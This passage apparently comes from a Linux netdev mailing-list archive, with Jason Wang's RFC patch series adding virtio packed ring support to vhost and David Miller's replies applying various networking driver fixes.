+   struct vhost_used_elem tvc_vq_used;
/* virtio-scsi initiator task attribute */
int tvc_task_attr;
/* virtio-scsi response incoming iovecs */
@@ -441,7 +441,7 @@ vhost_scsi_do_evt_work(struct vhost_scsi *vs, struct 
vhost_scsi_evt *evt)
struct vhost_virtqueue *vq = &vs->vqs[VHOST_SCSI_VQ_EVT].vq;
struct virtio_scsi_event *event = &evt->event;
struct virtio_scsi_event __user *eventp;
-   struct vring_used_elem used;
+   struct vhost_used_elem used;
unsigned out, in;
int ret;
 
@@ -785,7 +785,7 @@ static void vhost_scsi_submission_work(struct work_struct 
*work)
 static void
 vhost_scsi_send_bad_target(struct vhost_scsi *vs,
   struct vhost_virtqueue *vq,
-  struct vring_used_elem *used, unsigned out)
+  struct vhost_used_elem *used, unsigned out)
 {
struct virtio_scsi_cmd_resp __user *resp;
struct virtio_scsi_cmd_resp rsp;
@@ -808,7 +808,7 @@ vhost_scsi_handle_vq(struct vhost_scsi *vs, struct 
vhost_virtqueue *vq)
struct virtio_scsi_cmd_req v_req;
struct virtio_scsi_cmd_req_pi v_req_pi;
struct vhost_scsi_cmd *cmd;
-   struct vring_used_elem used;
+   stru

[RFC PATCH V2 4/8] vhost_net: do not explicitly manipulate vhost_used_elem

2018-03-25 Thread Jason Wang

Two helpers of setting/getting used len were introduced to avoid
explicitly manipulating vhost_used_elem in zerocopy code. This will be
used to hide used_elem internals and simplify packed ring
implementation.

Signed-off-by: Jason Wang 
---
 drivers/vhost/net.c   | 11 +--
 drivers/vhost/vhost.c | 12 ++--
 drivers/vhost/vhost.h |  5 +
 3 files changed, 20 insertions(+), 8 deletions(-)

diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
index 7ea2aee..7be8b55 100644
--- a/drivers/vhost/net.c
+++ b/drivers/vhost/net.c
@@ -337,9 +337,10 @@ static void vhost_zerocopy_signal_used(struct vhost_net 
*net,
int j = 0;
 
for (i = nvq->done_idx; i != nvq->upend_idx; i = (i + 1) % UIO_MAXIOV) {
-   if (vq->heads[i].elem.len == VHOST_DMA_FAILED_LEN)
+   if (vhost_get_used_len(vq, &vq->heads[i]) ==
+   VHOST_DMA_FAILED_LEN)
vhost_net_tx_err(net);
-   if (VHOST_DMA_IS_DONE(vq->heads[i].elem.len)) {
+   if (VHOST_DMA_IS_DONE(vhost_get_used_len(vq, &vq->heads[i]))) {
vq->heads[i].elem.len = VHOST_DMA_CLEAR_LEN;
++j;
} else
@@ -537,10 +538,8 @@ static void handle_tx(struct vhost_net *net)
struct ubuf_info *ubuf;
ubuf = nvq->ubuf_info + nvq->upend_idx;
 
-   vq->heads[nvq->upend_idx].elem.id =
-   cpu_to_vhost32(vq, used.elem.id);
-   vq->heads[nvq->upend_idx].elem.len =
-   VHOST_DMA_IN_PROGRESS;
+   vhost_set_used_len(vq, &used, VHOST_DMA_IN_PROGRESS);
+   vq->heads[nvq->upend_idx] = used;
ubuf->callback = vhost_zerocopy_callback;
ubuf->ctx = nvq->ubufs;
ubuf->desc = nvq->upend_idx;
diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
index 8744dae..65954d6 100644
--- a/drivers/vhost/vhost.c
+++ b/drivers/vhost/vhost.c
@@ -2100,11 +2100,19 @@ int vhost_get_vq_desc(struct vhost_virtqueue *vq,
 }
 EXPORT_SYMBOL_GPL(vhost_get_vq_desc);
 
-static void vhost_set_used_len(struct vhost_virtqueue *vq,
-  struct vhost_used_elem *used, int len)
+void vhost_set_used_len(struct vhost_virtqueue *vq,
+   struct vhost_used_elem *used, int len)
 {
used->elem.len = cpu_to_vhost32(vq, len);
 }
+EXPORT_SYMBOL_GPL(vhost_set_used_len);
+
+int vhost_get_used_len(struct vhost_virtqueue *vq,
+  struct vhost_used_elem *used)
+{
+   return vhost32_to_cpu(vq, used->elem.len);
+}
+EXPORT_SYMBOL_GPL(vhost_get_used_len);
 
 /* This is a multi-buffer version of vhost_get_desc, that works if
  * vq has read descriptors only.
diff --git a/drivers/vhost/vhost.h b/drivers/vhost/vhost.h
index 8399887..d57c875 100644
--- a/drivers/vhost/vhost.h
+++ b/drivers/vhost/vhost.h
@@ -198,6 +198,11 @@ int vhost_get_bufs(struct vhost_virtqueue *vq,
   unsigned *log_num,
   unsigned int quota,
   s16 *count);
+void vhost_set_used_len(struct vhost_virtqueue *vq,
+   struct vhost_used_elem *used,
+   int len);
+int vhost_get_used_len(struct vhost_virtqueue *vq,
+  struct vhost_used_elem *used);
 void vhost_discard_vq_desc(struct vhost_virtqueue *, int n);
 
 int vhost_vq_init_access(struct vhost_virtqueue *);
-- 
2.7.4

[RFC PATCH V2 6/8] virtio: introduce packed ring defines

2018-03-25 Thread Jason Wang

Signed-off-by: Jason Wang 
---
 include/uapi/linux/virtio_config.h |  9 +
 include/uapi/linux/virtio_ring.h   | 13 +
 2 files changed, 22 insertions(+)

diff --git a/include/uapi/linux/virtio_config.h 
b/include/uapi/linux/virtio_config.h
index 308e209..5903d51 100644
--- a/include/uapi/linux/virtio_config.h
+++ b/include/uapi/linux/virtio_config.h
@@ -71,4 +71,13 @@
  * this is for compatibility with legacy systems.
  */
 #define VIRTIO_F_IOMMU_PLATFORM33
+
+#define VIRTIO_F_RING_PACKED   34
+
+/*
+ * This feature indicates that all buffers are used by the device in
+ * the same order in which they have been made available.
+ */
+#define VIRTIO_F_IN_ORDER  35
+
 #endif /* _UAPI_LINUX_VIRTIO_CONFIG_H */
diff --git a/include/uapi/linux/virtio_ring.h b/include/uapi/linux/virtio_ring.h
index 6d5d5fa..e297580 100644
--- a/include/uapi/linux/virtio_ring.h
+++ b/include/uapi/linux/virtio_ring.h
@@ -43,6 +43,8 @@
 #define VRING_DESC_F_WRITE 2
 /* This means the buffer contains a list of buffer descriptors. */
 #define VRING_DESC_F_INDIRECT  4
+#define VRING_DESC_F_AVAIL  7
+#define VRING_DESC_F_USED  15
 
 /* The Host uses this in used->flags to advise the Guest: don't kick me when
  * you add a buffer.  It's unreliable, so it's simply an optimization.  Guest
@@ -62,6 +64,17 @@
  * at the end of the used ring. Guest should ignore the used->flags field. */
 #define VIRTIO_RING_F_EVENT_IDX29
 
+struct vring_desc_packed {
+   /* Buffer Address. */
+   __virtio64 addr;
+   /* Buffer Length. */
+   __virtio32 len;
+   /* Buffer ID. */
+   __virtio16 id;
+   /* The flags depending on descriptor type. */
+   __virtio16 flags;
+};
+
 /* Virtio ring descriptors: 16 bytes.  These can chain together via "next". */
 struct vring_desc {
/* Address (guest-physical). */
-- 
2.7.4

[RFC PATCH V2 5/8] vhost: vhost_put_user() can accept metadata type

2018-03-25 Thread Jason Wang

We assumes used ring update is the only user for vhost_put_user() in
the past. This may not be the case for the incoming packed ring which
may update the descriptor ring for used. So introduce a new type
parameter.

Signed-off-by: Jason Wang 
---
 drivers/vhost/vhost.c | 14 +++---
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
index 65954d6..dcac4d4 100644
--- a/drivers/vhost/vhost.c
+++ b/drivers/vhost/vhost.c
@@ -847,7 +847,7 @@ static inline void __user *__vhost_get_user(struct 
vhost_virtqueue *vq,
return __vhost_get_user_slow(vq, addr, size, type);
 }
 
-#define vhost_put_user(vq, x, ptr) \
+#define vhost_put_user(vq, x, ptr, type)   \
 ({ \
int ret = -EFAULT; \
if (!vq->iotlb) { \
@@ -855,7 +855,7 @@ static inline void __user *__vhost_get_user(struct 
vhost_virtqueue *vq,
} else { \
__typeof__(ptr) to = \
(__typeof__(ptr)) __vhost_get_user(vq, ptr, \
- sizeof(*ptr), VHOST_ADDR_USED); \
+ sizeof(*ptr), type); \
if (to != NULL) \
ret = __put_user(x, to); \
else \
@@ -1716,7 +1716,7 @@ static int vhost_update_used_flags(struct vhost_virtqueue 
*vq)
 {
void __user *used;
if (vhost_put_user(vq, cpu_to_vhost16(vq, vq->used_flags),
-  &vq->used->flags) < 0)
+  &vq->used->flags, VHOST_ADDR_USED) < 0)
return -EFAULT;
if (unlikely(vq->log_used)) {
/* Make sure the flag is seen before log. */
@@ -1735,7 +1735,7 @@ static int vhost_update_used_flags(struct vhost_virtqueue 
*vq)
 static int vhost_update_avail_event(struct vhost_virtqueue *vq, u16 
avail_event)
 {
if (vhost_put_user(vq, cpu_to_vhost16(vq, vq->avail_idx),
-  vhost_avail_event(vq)))
+  vhost_avail_event(vq), VHOST_ADDR_USED))
return -EFAULT;
if (unlikely(vq->log_used)) {
void __user *used;
@@ -2218,12 +2218,12 @@ static int __vhost_add_used_n(struct vhost_virtqueue 
*vq,
used = vq->used->ring + start;
for (i = 0; i < count; i++) {
if (unlikely(vhost_put_user(vq, heads[i].elem.id,
-   &used[i].id))) {
+   &used[i].id, VHOST_ADDR_USED))) {
vq_err(vq, "Failed to write used id");
return -EFAULT;
}
if (unlikely(vhost_put_user(vq, heads[i].elem.len,
-   &used[i].len))) {
+   &used[i].len, VHOST_ADDR_USED))) {
vq_err(vq, "Failed to write used len");
return -EFAULT;
}
@@ -2269,7 +2269,7 @@ int vhost_add_used_n(struct vhost_virtqueue *vq, struct 
vhost_used_elem *heads,
/* Make sure buffer is written before we update index. */
smp_wmb();
if (vhost_put_user(vq, cpu_to_vhost16(vq, vq->last_used_idx),
-  &vq->used->idx)) {
+  &vq->used->idx, VHOST_ADDR_USED)) {
vq_err(vq, "Failed to increment used idx");
return -EFAULT;
}
-- 
2.7.4

[RFC PATCH V2 8/8] vhost: event suppression for packed ring

2018-03-25 Thread Jason Wang

This patch introduces basic support for event suppression aka driver
and device area. Compile tested only.

Signed-off-by: Jason Wang 
---
 drivers/vhost/vhost.c| 169 ---
 drivers/vhost/vhost.h|  10 ++-
 include/uapi/linux/virtio_ring.h |  19 +
 3 files changed, 183 insertions(+), 15 deletions(-)

diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
index 6177e4d..ff83a2e 100644
--- a/drivers/vhost/vhost.c
+++ b/drivers/vhost/vhost.c
@@ -1143,10 +1143,15 @@ static int vq_access_ok_packed(struct vhost_virtqueue 
*vq, unsigned int num,
   struct vring_used __user *used)
 {
struct vring_desc_packed *packed = (struct vring_desc_packed *)desc;
+   struct vring_packed_desc_event *driver_event =
+   (struct vring_packed_desc_event *)avail;
+   struct vring_packed_desc_event *device_event =
+   (struct vring_packed_desc_event *)used;
 
-   /* FIXME: check device area and driver area */
return access_ok(VERIFY_READ, packed, num * sizeof(*packed)) &&
-  access_ok(VERIFY_WRITE, packed, num * sizeof(*packed));
+  access_ok(VERIFY_WRITE, packed, num * sizeof(*packed)) &&
+  access_ok(VERIFY_READ, driver_event, sizeof(*driver_event)) &&
+  access_ok(VERIFY_WRITE, device_event, sizeof(*device_event));
 }
 
 static int vq_access_ok_split(struct vhost_virtqueue *vq, unsigned int num,
@@ -1222,14 +1227,27 @@ static int iotlb_access_ok(struct vhost_virtqueue *vq,
return true;
 }
 
-int vq_iotlb_prefetch(struct vhost_virtqueue *vq)
+int vq_iotlb_prefetch_packed(struct vhost_virtqueue *vq)
+{
+   int num = vq->num;
+
+   return iotlb_access_ok(vq, VHOST_ACCESS_RO, (u64)(uintptr_t)vq->desc,
+  num * sizeof(*vq->desc), VHOST_ADDR_DESC) &&
+  iotlb_access_ok(vq, VHOST_ACCESS_WO, (u64)(uintptr_t)vq->desc,
+  num * sizeof(*vq->desc), VHOST_ADDR_DESC) &&
+  iotlb_access_ok(vq, VHOST_ACCESS_RO,
+  (u64)(uintptr_t)vq->driver_event,
+  sizeof(*vq->driver_event), VHOST_ADDR_AVAIL) &&
+  iotlb_access_ok(vq, VHOST_ACCESS_WO,
+  (u64)(uintptr_t)vq->device_event,
+  sizeof(*vq->device_event), VHOST_ADDR_USED);
+}
+
+int vq_iotlb_prefetch_split(struct vhost_virtqueue *vq)
 {
size_t s = vhost_has_feature(vq, VIRTIO_RING_F_EVENT_IDX) ? 2 : 0;
unsigned int num = vq->num;
 
-   if (!vq->iotlb)
-   return 1;
-
return iotlb_access_ok(vq, VHOST_ACCESS_RO, (u64)(uintptr_t)vq->desc,
   num * sizeof(*vq->desc), VHOST_ADDR_DESC) &&
   iotlb_access_ok(vq, VHOST_ACCESS_RO, (u64)(uintptr_t)vq->avail,
@@ -1241,6 +1259,17 @@ int vq_iotlb_prefetch(struct vhost_virtqueue *vq)
   num * sizeof(*vq->used->ring) + s,
   VHOST_ADDR_USED);
 }
+
+int vq_iotlb_prefetch(struct vhost_virtqueue *vq)
+{
+   if (!vq->iotlb)
+   return 1;
+
+   if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+   return vq_iotlb_prefetch_packed(vq);
+   else
+   return vq_iotlb_prefetch_split(vq);
+}
 EXPORT_SYMBOL_GPL(vq_iotlb_prefetch);
 
 /* Can we log writes? */
@@ -1756,6 +1785,29 @@ static int vhost_update_used_flags(struct 
vhost_virtqueue *vq)
return 0;
 }
 
+static int vhost_update_device_flags(struct vhost_virtqueue *vq,
+__virtio16 device_flags)
+{
+   void __user *flags;
+
+   if (vhost_put_user(vq, cpu_to_vhost16(vq, device_flags),
+  &vq->device_event->desc_event_flags,
+  VHOST_ADDR_DESC) < 0)
+   return -EFAULT;
+   if (unlikely(vq->log_used)) {
+   /* Make sure the flag is seen before log. */
+   smp_wmb();
+   /* Log used flag write. */
+   flags = &vq->device_event->desc_event_flags;
+   log_write(vq->log_base, vq->log_addr +
+ (flags - (void __user *)vq->device_event),
+ sizeof(vq->used->flags));
+   if (vq->log_ctx)
+   eventfd_signal(vq->log_ctx, 1);
+   }
+   return 0;
+}
+
 static int vhost_update_avail_event(struct vhost_virtqueue *vq, u16 
avail_event)
 {
if (vhost_put_user(vq, cpu_to_vhost16(vq, vq->avail_idx),
@@ -2667,16 +2719,13 @@ int vhost_add_used_n(struct vhost_virtqueue *vq,
 }
 EXPORT_SYMBOL_GPL(vhost_add_used_n);
 
-static bool vhost_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+static bool vhost_notify_split(struct vhost_dev *dev,
+  struct vhost_virtqueue *vq)
 {
__u16 old, new;
__virtio16 event;
bool v;
 
-   /* FIXME: check

[RFC PATCH V2 7/8] vhost: packed ring support

2018-03-25 Thread Jason Wang

Signed-off-by: Jason Wang 
---
 drivers/vhost/net.c   |   5 +-
 drivers/vhost/vhost.c | 530 ++
 drivers/vhost/vhost.h |   7 +-
 3 files changed, 505 insertions(+), 37 deletions(-)

diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
index 7be8b55..84905d5 100644
--- a/drivers/vhost/net.c
+++ b/drivers/vhost/net.c
@@ -67,7 +67,8 @@ enum {
VHOST_NET_FEATURES = VHOST_FEATURES |
 (1ULL << VHOST_NET_F_VIRTIO_NET_HDR) |
 (1ULL << VIRTIO_NET_F_MRG_RXBUF) |
-(1ULL << VIRTIO_F_IOMMU_PLATFORM)
+(1ULL << VIRTIO_F_IOMMU_PLATFORM) |
+(1ULL << VIRTIO_F_RING_PACKED)
 };
 
 enum {
@@ -706,6 +707,8 @@ static void handle_rx(struct vhost_net *net)
vq_log = unlikely(vhost_has_feature(vq, VHOST_F_LOG_ALL)) ?
vq->log : NULL;
mergeable = vhost_has_feature(vq, VIRTIO_NET_F_MRG_RXBUF);
+   /* FIXME: workaround for current dpdk prototype */
+   mergeable = false;
 
while ((sock_len = vhost_net_rx_peek_head_len(net, sock->sk))) {
sock_len += sock_hlen;
diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
index dcac4d4..6177e4d 100644
--- a/drivers/vhost/vhost.c
+++ b/drivers/vhost/vhost.c
@@ -324,6 +324,7 @@ static void vhost_vq_reset(struct vhost_dev *dev,
vhost_reset_is_le(vq);
vhost_disable_cross_endian(vq);
vq->busyloop_timeout = 0;
+   vq->used_wrap_counter = true;
vq->umem = NULL;
vq->iotlb = NULL;
__vhost_vq_meta_reset(vq);
@@ -1136,10 +1137,22 @@ static int vhost_iotlb_miss(struct vhost_virtqueue *vq, 
u64 iova, int access)
return 0;
 }
 
-static int vq_access_ok(struct vhost_virtqueue *vq, unsigned int num,
-   struct vring_desc __user *desc,
-   struct vring_avail __user *avail,
-   struct vring_used __user *used)
+static int vq_access_ok_packed(struct vhost_virtqueue *vq, unsigned int num,
+  struct vring_desc __user *desc,
+  struct vring_avail __user *avail,
+  struct vring_used __user *used)
+{
+   struct vring_desc_packed *packed = (struct vring_desc_packed *)desc;
+
+   /* FIXME: check device area and driver area */
+   return access_ok(VERIFY_READ, packed, num * sizeof(*packed)) &&
+  access_ok(VERIFY_WRITE, packed, num * sizeof(*packed));
+}
+
+static int vq_access_ok_split(struct vhost_virtqueue *vq, unsigned int num,
+ struct vring_desc __user *desc,
+ struct vring_avail __user *avail,
+ struct vring_used __user *used)
 
 {
size_t s = vhost_has_feature(vq, VIRTIO_RING_F_EVENT_IDX) ? 2 : 0;
@@ -1151,6 +1164,17 @@ static int vq_access_ok(struct vhost_virtqueue *vq, 
unsigned int num,
sizeof *used + num * sizeof *used->ring + s);
 }
 
+static int vq_access_ok(struct vhost_virtqueue *vq, unsigned int num,
+   struct vring_desc __user *desc,
+   struct vring_avail __user *avail,
+   struct vring_used __user *used)
+{
+   if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+   return vq_access_ok_packed(vq, num, desc, avail, used);
+   else
+   return vq_access_ok_split(vq, num, desc, avail, used);
+}
+
 static void vhost_vq_meta_update(struct vhost_virtqueue *vq,
 const struct vhost_umem_node *node,
 int type)
@@ -1763,6 +1787,9 @@ int vhost_vq_init_access(struct vhost_virtqueue *vq)
 
vhost_init_is_le(vq);
 
+   if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+   return 0;
+
r = vhost_update_used_flags(vq);
if (r)
goto err;
@@ -1836,7 +1863,8 @@ static int translate_desc(struct vhost_virtqueue *vq, u64 
addr, u32 len,
 /* Each buffer in the virtqueues is actually a chain of descriptors.  This
  * function returns the next descriptor in the chain,
  * or -1U if we're at the end. */
-static unsigned next_desc(struct vhost_virtqueue *vq, struct vring_desc *desc)
+static unsigned next_desc_split(struct vhost_virtqueue *vq,
+   struct vring_desc *desc)
 {
unsigned int next;
 
@@ -1849,11 +1877,17 @@ static unsigned next_desc(struct vhost_virtqueue *vq, 
struct vring_desc *desc)
return next;
 }
 
-static int get_indirect(struct vhost_virtqueue *vq,
-   struct iovec iov[], unsigned int iov_size,
-   unsigned int *out_num, unsigned int *in_num,
-   struct vhost_log *log, unsigned int *log_num,
-   struct vring_desc *indirect)
+static unsigned next_desc_packed(struct vhost_virtqueue *vq,
+

[RFC PATCH V2 2/8] vhost: hide used ring layout from device

2018-03-25 Thread Jason Wang

We used to return descriptor head by vhost_get_vq_desc() to device and
pass it back to vhost_add_used() and its friends. This exposes the
internal used ring layout to device which makes it hard to be extended for
e.g packed ring layout.

So this patch tries to hide the used ring layout by

- letting vhost_get_vq_desc() return pointer to struct vring_used_elem
- accepting pointer to struct vring_used_elem in vhost_add_used() and
  vhost_add_used_and_signal()

This could help to hide used ring layout and make it easier to
implement packed ring on top.

Signed-off-by: Jason Wang 
---
 drivers/vhost/net.c   | 46 +-
 drivers/vhost/scsi.c  | 62 +++
 drivers/vhost/vhost.c | 52 +-
 drivers/vhost/vhost.h |  9 +---
 drivers/vhost/vsock.c | 42 +-
 5 files changed, 112 insertions(+), 99 deletions(-)

diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
index 57dfa63..f821fcd 100644
--- a/drivers/vhost/net.c
+++ b/drivers/vhost/net.c
@@ -422,22 +422,24 @@ static int vhost_net_enable_vq(struct vhost_net *n,
 
 static int vhost_net_tx_get_vq_desc(struct vhost_net *net,
struct vhost_virtqueue *vq,
+   struct vring_used_elem *used_elem,
struct iovec iov[], unsigned int iov_size,
unsigned int *out_num, unsigned int *in_num)
 {
unsigned long uninitialized_var(endtime);
-   int r = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov),
+   int r = vhost_get_vq_desc(vq, used_elem, vq->iov, ARRAY_SIZE(vq->iov),
  out_num, in_num, NULL, NULL);
 
-   if (r == vq->num && vq->busyloop_timeout) {
+   if (r == -ENOSPC && vq->busyloop_timeout) {
preempt_disable();
endtime = busy_clock() + vq->busyloop_timeout;
while (vhost_can_busy_poll(vq->dev, endtime) &&
   vhost_vq_avail_empty(vq->dev, vq))
cpu_relax();
preempt_enable();
-   r = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov),
- out_num, in_num, NULL, NULL);
+   r = vhost_get_vq_desc(vq, used_elem, vq->iov,
+ ARRAY_SIZE(vq->iov), out_num, in_num,
+ NULL, NULL);
}
 
return r;
@@ -459,7 +461,6 @@ static void handle_tx(struct vhost_net *net)
struct vhost_net_virtqueue *nvq = &net->vqs[VHOST_NET_VQ_TX];
struct vhost_virtqueue *vq = &nvq->vq;
unsigned out, in;
-   int head;
struct msghdr msg = {
.msg_name = NULL,
.msg_namelen = 0,
@@ -472,6 +473,7 @@ static void handle_tx(struct vhost_net *net)
size_t hdr_size;
struct socket *sock;
struct vhost_net_ubuf_ref *uninitialized_var(ubufs);
+   struct vring_used_elem used;
bool zcopy, zcopy_used;
 
mutex_lock(&vq->mutex);
@@ -494,20 +496,20 @@ static void handle_tx(struct vhost_net *net)
vhost_zerocopy_signal_used(net, vq);
 
 
-   head = vhost_net_tx_get_vq_desc(net, vq, vq->iov,
-   ARRAY_SIZE(vq->iov),
-   &out, &in);
-   /* On error, stop handling until the next kick. */
-   if (unlikely(head < 0))
-   break;
+   err = vhost_net_tx_get_vq_desc(net, vq, &used, vq->iov,
+  ARRAY_SIZE(vq->iov),
+  &out, &in);
/* Nothing new?  Wait for eventfd to tell us they refilled. */
-   if (head == vq->num) {
+   if (err == -ENOSPC) {
if (unlikely(vhost_enable_notify(&net->dev, vq))) {
vhost_disable_notify(&net->dev, vq);
continue;
}
break;
}
+   /* On error, stop handling until the next kick. */
+   if (unlikely(err < 0))
+   break;
if (in) {
vq_err(vq, "Unexpected descriptor format for TX: "
   "out %d, int %d\n", out, in);
@@ -535,7 +537,8 @@ static void handle_tx(struct vhost_net *net)
struct ubuf_info *ubuf;
ubuf = nvq->ubuf_info + nvq->upend_idx;
 
-   vq->heads[nvq->upend_idx].id = cpu_to_vhost32(vq, head);
+   vq->heads[nvq->upend_idx].id =
+   cpu_to_vhost32(vq, used.id);
vq->heads[nvq->upend_idx].len = VHOST_DMA_IN_PROGRESS;

Re: pull-request: wireless-drivers-next 2018-03-24

2018-03-25 Thread David Miller

From: Kalle Valo 
Date: Sat, 24 Mar 2018 14:30:01 +0200

> here's the first pull request to net-next for 4.17. What's special here
> is the addition of a new bluetooth driver, but that's been acked by
> Marcel. Also we add a new include file to include/net because of that.
> 
> Please let me know if you have any problems.

Also pulled, thanks Kalle.

Re: pull-request: wireless-drivers 2018-03-24

2018-03-25 Thread David Miller

From: Kalle Valo 
Date: Sat, 24 Mar 2018 13:03:13 +0200

> This is a pull request to the net tree for 4.16. I'm not planning to
> send anything more in this cycle for 4.16, unless something really major
> comes up.
> 
> Please let me know if you have any problems.

Pulled.

Re: [RFC PATCH net-next] tipc: tipc_disc_addr_trial_msg() can be static

2018-03-25 Thread David Miller

From: kbuild test robot 
Date: Sat, 24 Mar 2018 03:47:42 +0800

> Fixes: 25b0b9c4e835 ("tipc: handle collisions of 32-bit node address hash 
> values")
> Signed-off-by: Fengguang Wu 

Applied.

Re: [PATCH net v2] ipv6: the entire IPv6 header chain must fit the first fragment

2018-03-25 Thread David Miller

From: Paolo Abeni 
Date: Fri, 23 Mar 2018 14:47:30 +0100

> While building ipv6 datagram we currently allow arbitrary large
> extheaders, even beyond pmtu size. The syzbot has found a way
> to exploit the above to trigger the following splat:
 ...
> As stated by RFC 7112 section 5:
> 
>When a host fragments an IPv6 datagram, it MUST include the entire
>IPv6 Header Chain in the First Fragment.
> 
> So this patch addresses the issue dropping datagrams with excessive
> extheader length. It also updates the error path to report to the
> calling socket nonnegative pmtu values.
> 
> The issue apparently predates git history.
> 
> v1 -> v2: cleanup error path, as per Eric's suggestion
> 
> Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
> Reported-by: syzbot+91e6f9932ff122fa4...@syzkaller.appspotmail.com
> Signed-off-by: Paolo Abeni 

Applied and queued up for -stable.

Re: [PATCH] net/usb/qmi_wwan.c: Add USB id for lt4120 modem

2018-03-25 Thread David Miller

From: Torsten Hilbrich 
Date: Fri, 23 Mar 2018 14:26:18 +0100

> This is needed to support the modem found in HP EliteBook 820 G3.
> 
> Signed-off-by: Torsten Hilbrich 

This patch was corrupted by your email client, it transformed TAB
characters into sequence of spaces.

Please email the patch to yourself and make sure you can apply
the patch you receive in that email cleanly before resubmitting
it here.

Thank you.

Re: [PATCH] netlink: make sure nladdr has correct size in netlink_connect()

2018-03-25 Thread David Miller

From: Alexander Potapenko 
Date: Fri, 23 Mar 2018 13:49:02 +0100

> KMSAN reports use of uninitialized memory in the case when |alen| is
> smaller than sizeof(struct sockaddr_nl), and therefore |nladdr| isn't
> fully copied from the userspace.
> 
> Signed-off-by: Alexander Potapenko 
> Fixes: 1da177e4c3f41524 ("Linux-2.6.12-rc2")
> ---
> v2: fixed a typo spotted by Eric Dumazet

Applied and queued up for -stable, thank you.

Re: [PATCH net-next] ibmvnic: Potential NULL dereference in clean_one_tx_pool()

2018-03-25 Thread David Miller

From: Dan Carpenter 
Date: Fri, 23 Mar 2018 14:36:15 +0300

> There is an && vs || typo here, which potentially leads to a NULL
> dereference.
> 
> Fixes: e9e1e97884b7 ("ibmvnic: Update TX pool cleaning routine")
> Signed-off-by: Dan Carpenter 

Applied, thanks Dan.

Re: [PATCH net-next] cxgb4: depend on firmware event for link status

2018-03-25 Thread David Miller

From: Ganesh Goudar 
Date: Fri, 23 Mar 2018 17:03:10 +0530

> Depend on the firmware sending us link status changes,
> rather than assuming that the link goes down upon L1
> configuration.
> 
> Signed-off-by: Casey Leedom 
> Signed-off-by: Ganesh Goudar 

Applied.

Re: [PATCH net-next] cxgb4: support new ISSI flash parts

2018-03-25 Thread David Miller

From: Ganesh Goudar 
Date: Fri, 23 Mar 2018 17:05:49 +0530

> Add support for new 32MB and 64MB ISSI (Integrated Silicon
> Solution, Inc.) FLASH parts.
> 
> Signed-off-by: Casey Leedom 
> Signed-off-by: Ganesh Goudar 

Applied.

Re: [PATCH net-next] cxgb4: copy vlan_id in ndo_get_vf_config

2018-03-25 Thread David Miller

From: Ganesh Goudar 
Date: Fri, 23 Mar 2018 15:48:46 +0530

> From: Arjun Vynipadath 
> 
> Copy vlan_id to get it displayed in vf info.
> 
> Signed-off-by: Arjun Vynipadath 
> Signed-off-by: Casey Leedom 
> Signed-off-by: Ganesh Goudhar 

Applied.

Re: [PATCH v1 net] lan78xx: Set ASD in MAC_CR when EEE is enabled.

2018-03-25 Thread David Miller

From: Raghuram Chary J 
Date: Fri, 23 Mar 2018 15:48:08 +0530

> Description:
> EEE does not work with lan7800 when AutoSpeed is not set.
> (This can happen when EEPROM is not populated or configured incorrectly)
> 
> Root-Cause:
> When EEE is enabled, the mac config register ASD is not set
> i.e. in default state, causing EEE fail.
> 
> Fix:
> Set the register when eeprom is not present.
> 
> Fixes: 55d7de9de6c3 ("Microchip's LAN7800 family USB 2/3 to 10/100/1000 
> Ethernet device driver")
> Signed-off-by: Raghuram Chary J 
> ---
> v0->v1:
>  * Resolved the style related problems.
>  * Removed 1/3 patch count from Subject line.

Applied, thanks.

Re: [PATCH V2 net 1/1] net/ipv4: disable SMC TCP option with SYN Cookies

2018-03-25 Thread David Miller

From: Ursula Braun 
Date: Fri, 23 Mar 2018 11:05:45 +0100

> From: Hans Wippel 
> 
> Currently, the SMC experimental TCP option in a SYN packet is lost on
> the server side when SYN Cookies are active. However, the corresponding
> SYNACK sent back to the client contains the SMC option. This causes an
> inconsistent view of the SMC capabilities on the client and server.
> 
> This patch disables the SMC option in the SYNACK when SYN Cookies are
> active to avoid this issue.
> 
> Fixes: 60e2a7780793b ("tcp: TCP experimental option for SMC")
> Signed-off-by: Hans Wippel 
> Signed-off-by: Ursula Braun 

Applied, thank you.

Re: [PATCH net-next] cxgb4: Setup FW queues before registering netdev

2018-03-25 Thread David Miller

From: Ganesh Goudar 
Date: Fri, 23 Mar 2018 15:25:10 +0530

> From: Arjun Vynipadath 
> 
> When NetworkManager is enabled, there are chances that interface up
> is called even before probe completes. This means we have not yet
> allocated the FW sge queues, hence rest of ingress queue allocation
> wont be proper. Fix this by calling setup_fw_sge_queues() before
> register_netdev().
> 
> Fixes: 0fbc81b3ad51 ('chcr/cxgb4i/cxgbit/RDMA/cxgb4: Allocate resources 
> dynamically for all cxgb4 ULD's')
> Signed-off-by: Arjun Vynipadath 
> Signed-off-by: Casey Leedom 
> Signed-off-by: Ganesh Goudar 

Applied, thank you.

Re: [PATCH net-next 0/2] net: broadcom: Adaptive interrupt coalescing

2018-03-25 Thread David Miller

From: Florian Fainelli 
Date: Thu, 22 Mar 2018 18:19:31 -0700

> This patch series adds adaptive interrupt coalescing for the Gigabit
> Ethernet drivers SYSTEMPORT and GENET.
> 
> This really helps lower the interrupt count and system load, as
> measured by vmstat for a Gigabit TCP RX session:

Looks good to me, series applied, thanks Florian.

Re: [PATCH v3 net-next 0/2] Fixes to allow mv88e6xxx module to be reloaded

2018-03-25 Thread David Miller

From: Andrew Lunn 
Date: Sun, 25 Mar 2018 23:43:13 +0200

> As reported by Uwe Kleine-König, the interrupt trigger is first
> configured by DT and then reconfigured to edge. This results in a
> failure on EPROBE_DEFER, or if the module is unloaded and reloaded.
> 
> A second crash happens on module reload due to a missing call to the
> common IRQ free code when using polled interrupts.
> 
> With these fixes in place, it becomes possible to load and unload the
